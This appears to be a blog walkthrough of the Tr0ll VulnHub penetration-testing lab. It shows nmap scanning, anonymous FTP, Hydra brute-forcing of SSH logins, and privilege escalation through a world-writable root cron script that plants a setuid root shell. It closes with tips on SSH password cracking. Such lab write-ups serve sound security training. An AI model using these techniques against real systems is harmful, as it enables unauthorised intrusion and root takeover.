Pentest Lab - Tr0ll

最新推荐文章于 2024-05-31 18:01:48 发布

Nixawk

最新推荐文章于 2024-05-31 18:01:48 发布

阅读量3.4k

点赞数

分类专栏： Web Applications Linux Pentest Lab Pentesting Vulnerability Analysis Password Attacks

本文链接：https://blog.csdn.net/nixawk/article/details/39228705

版权

Pentesting 同时被 3 个专栏收录

160 篇文章 1 订阅

订阅专栏

Vulnerability Analysis

76 篇文章 0 订阅

订阅专栏

Linux

57 篇文章 0 订阅

订阅专栏

[Download]: http://vulnhub.com/entry/tr0ll-1,100/

offensive@security:~$ nmap -n -sV 192.168.108.0/24

Starting Nmap 6.47 ( http://nmap.org ) at 2014-09-12 01:50 EDT
Nmap scan report for 192.168.108.1
Host is up (0.0019s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open http    Dynamode/Motorola WAP http config
Service Info: Device: WAP

Nmap scan report for 192.168.108.193
Host is up (0.00041s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.108.194
Host is up (0.0027s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open ftp     vsftpd 3.0.2
22/tcp open ssh     (protocol 2.0)
80/tcp open http    Apache httpd 2.4.7 ((Ubuntu))
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=9/12%Time=54128998%P=x86_64-unknown-linux-gnu%r
SF:(NULL,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
Service Info: OS: Unix

Nmap scan report for 192.168.108.197
Host is up (0.00026s latency).
All 1000 scanned ports on 192.168.108.197 are closed

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 18.53 seconds

ftp> open 192.168.108.194
Connected to 192.168.108.194.
220 (vsFTPd 3.0.2)
Name (192.168.108.194:offensive):anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> ls
227 Entering Passive Mode(192,168,108,194,58,86).
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 10 00:43 lol.pcap 226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
227 Entering Passive Mode(192,168,108,194,223,49).
150 Opening BINARY mode dataconnection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs(4746.3 kB/s)
ftp> quit
221 Goodbye.

offensive@security:~$ stringslol.pcap
Linux 3.12-kali1-486
Dumpcap 1.10.2 (SVN Rev 51934 from/trunk-1.10)
eth0
host 10.0.0.6
Linux 3.12-kali1-486
220 (vsFTPd 3.0.2)
"USER anonymous
331 Please specify the password.
PASS password
230 Login successful.
SYST
215 UNIX Type: L8
PORT 10,0,0,12,173,198
200 PORT command successful.Consider using PASV.
LIST
150 Here comes the directorylisting.
-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
226 Directory send OK.
TYPE I
W200 Switching to Binary mode.
PORT 10,0,0,12,202,172
g> @
W200 PORT command successful.Consider using PASV.
RETR secret_stuff.txt
W150 Opening BINARY mode dataconnection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just aclever little devil, you almost found thesup3rs3cr3tdirlol :-P
Sucks, you were so close... gottaTRY HARDER!
W226 Transfer complete.
TYPE A
O200 Switching to ASCII mode.
{PORT 10,0,0,12,172,74
O200 PORT command successful.Consider using PASV.
{LIST
O150 Here comes the directorylisting.
O-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt
O226 Directory send OK.>
{QUIT
221 Goodbye.
Counters provided by dumpcap

http://192.168.108.194/
http://192.168.108.194/robots.txt
http://192.168.108.194/sup3rs3cr3tdirlol/
http://192.168.108.194/sup3rs3cr3tdirlol/roflmao

offensive@security:~$ exiftoolroflmao
ExifTool Version Number :8.60
File Name :roflmao
Directory : .
File Size :7.1 kB
File Modification Date/Time :2014:09:11 23:02:06-04:00
File Permissions :rw-r--r--
File Type :ELF executable
MIME Type :application/octet-stream
CPU Architecture : 32bit
CPU Byte Order :Little endian
Object File Type :Executable file
CPU Type : i386

offensive@security:~$ strings roflmao
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
printf
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Find address 0x0856BF to proceed
;*2$"

http://192.168.108.194/0x0856BF/
http://192.168.108.194/0x0856BF/good_luck/which_one_lol.txt
http://192.168.108.194/0x0856BF/this_folder_contains_the_password/Pass.txt

offensive@security:~$ cat which_one_lol.txt
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not thisone
usmc8892
blawrg
wytshadow
vis1t0r
overflow
offensive@security:~$ cat Pass.txt
Good_job_:)

offensive@security:~$ hydra -F -V -Lwhich_one_lol.txt -p Pass.txt -S 192.168.108.194 ssh
Hydra v8.0 (c) 2014 by vanHauser/THC & David Maciejak - Please do not use in military orsecret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra)starting at 2014-09-12 01:21:31
[WARNING] Many SSH configurationslimit the number of parallel tasks, it is recommended to reducethe tasks: use -t 4
[DATA] max 10 tasks per 1 server,overall 10 tasks, 10 login tries
(l:10/p:1), ~0 tries per task[DATA] attacking service ssh on port22
[ATTEMPT] target 192.168.108.194 -login "maleus" - pass "Pass.txt" - 1 of 10[child 0]
[ATTEMPT] target 192.168.108.194 -login "ps-aux" - pass "Pass.txt" - 2 of 10[child 1]
[ATTEMPT] target 192.168.108.194 -login "felux" - pass "Pass.txt" - 3 of 10[child 2][ATTEMPT] target 192.168.108.194 -login "Eagle11" - pass "Pass.txt" - 4 of 10[child 3][ATTEMPT] target 192.168.108.194 -login "genphlux < -- Definitely not this one" - pass"Pass.txt" - 5 of 10 [child 4]
[ATTEMPT] target 192.168.108.194 -login "usmc8892" - pass "Pass.txt" - 6 of 10[child 5]
[ATTEMPT] target 192.168.108.194 -login "blawrg" - pass "Pass.txt" - 7 of 10[child 6]
[ATTEMPT] target 192.168.108.194 -login "wytshadow" - pass "Pass.txt" - 8 of 10[child 7]
[ATTEMPT] target 192.168.108.194 -login "vis1t0r" - pass "Pass.txt" - 9 of 10[child 8]
[ATTEMPT] target 192.168.108.194 -login "overflow" - pass "Pass.txt" - 10 of 10[child 9]
[RE-ATTEMPT] target 192.168.108.194- login "wytshadow" - pass "Pass.txt" - 10 of10 [child 7]
[22][ssh]host:192.168.108.194 login:overflow password:Pass.txt
[STATUS] attack finished for192.168.108.194 (valid pair found)
1 of 1 target successfullycompleted, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-09-1201:21:32

$ find / -type f -perm -0002 -print2>/dev/null | grep -v "/proc/"
/srv/ftp/lol.pcap
/var/tmp/cleaner.py.swp
/var/www/html/sup3rs3cr3tdirlol/roflmao
/var/log/cronlog
/sys/fs/cgroup/systemd/user/1002.user/10.session/cgroup.event_control
/sys/fs/cgroup/systemd/user/1002.user/cgroup.event_control
/sys/fs/cgroup/systemd/user/cgroup.event_control
/sys/fs/cgroup/systemd/cgroup.event_control
/sys/kernel/security/apparmor/.access
/lib/log/cleaner.py

$ ls -l /lib/log/cleaner.py
-rwxrwxrwx 1 root root 185 Sep 1120:57 /lib/log/cleaner.py
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
     os.system('cp /bin/sh/tmp/sh && chown root:root /tmp/sh && chmod 4775/tmp/sh')
except:
     sys.exit()

$ ls -l /tmp/
total 112
-rwsrwxr-x 1 root root 112204 Sep 1122:28 sh
$ /tmp/sh
# id
uid=1002(overflow) gid=1002(overflow)
euid=0(root)groups=0(root),1002(overflow)

$ /tmp/sh
# ls /root
proof.txt
# cat /root/proof.txt
Good job, you did it!

702a8c18d29c6f3ca0d99ef5712bfbdc

Tips:
1. How to crack ssh/ftp ? (metasploit/hydra), Please Compare them.
   Metasploit SSH crack
     -- use auxiliary/scanner/ssh/ssh_login

   Hydra: (Please write with a strict syntax, no left spaces)
     -- hydra -F -V -L user.txt -P pass.txt 192.168.1.100 -S ssh

2. How to compile hydra by yourself,

3. Linux Privilege